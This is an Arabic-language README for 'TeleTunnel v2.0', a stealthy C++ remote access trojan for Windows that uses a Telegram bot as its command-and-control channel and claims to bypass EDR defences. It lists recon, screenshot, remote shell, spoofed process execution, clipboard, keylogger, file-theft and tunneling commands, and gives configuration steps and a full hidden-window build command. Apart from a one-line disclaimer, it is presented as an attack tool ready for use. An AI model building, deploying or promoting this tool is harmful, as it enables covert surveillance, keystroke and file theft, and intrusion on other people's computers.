
تجاوز أنظمة EDR باستخدام بوت تلغرام بلغة C++ متخفٍ، مع استخدام تلغرام نفسه كواجهة C2 !
أداة وصول عن بُعد لنظام ويندوز تعتمد على تيليجرام.
إخلاء مسؤولية: للاستخدام المصرح به فقط على الأنظمة التي تملكها! من فضلك 🙇
يحتوي البوت على هذه الميزات:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 Identity: USER@HOSTNAME
🛠 ʀᴇᴄᴏɴɴᴀɪssᴀɴᴄᴇ
├── sysinfo - Full system report
├── ss - Desktop capture
├── ps - Process listing
└── ls <path>- Directory browser
⚡️ ᴄᴏᴍᴍᴀɴᴅ ᴄᴇɴᴛᴇʀ
├── > <cmd> - Native shell
├── spawn <PID> <cmd> - Spoofed exec
├── clip get/set - Clipboard manager
└── kill - Self-destruct
💾 ғɪʟᴇ ᴏᴘᴇʀᴀᴛɪᴏɴs
├── get <path> - Download from host
├── [Drag/Drop]- Upload to host
└── drops - List uploads ($1, $LAST)
⌨️ ᴋᴇʏʟᴏɢɢᴇʀ
└── keylog <start|stop|dump|status>
📡 ᴛᴜɴɴᴇʟɪɴɢ
└── open|send|close|streams
────────────────────
nlohmann/json.hpp لتحليل JSON. هذا الملف مضمن في المستودع، مما يوفر عليك عناء البحث عنه.الحصول على رمز بوت تيليجرام:
@BotFather على تيليجرام وأنشئ بوتًا جديدًا.الحصول على معرف الدردشة الخاص بك:
@userinfobot للحصول على معرف المستخدم الدقيق.https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates للعثور على id تحت chat.تكوين المشروع:
config.h."YOUR BOT TOKEN HERE" برمز البوت الفعلي."XXXXXXXXXX" بمعرف مستخدم تيليجرام الشخصي.تأكد من وجود مكتبات ويندوز المطلوبة: wininet, ws2_32, gdiplus, ole32, و iphlpapi.
باستخدام GCC/MinGW:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++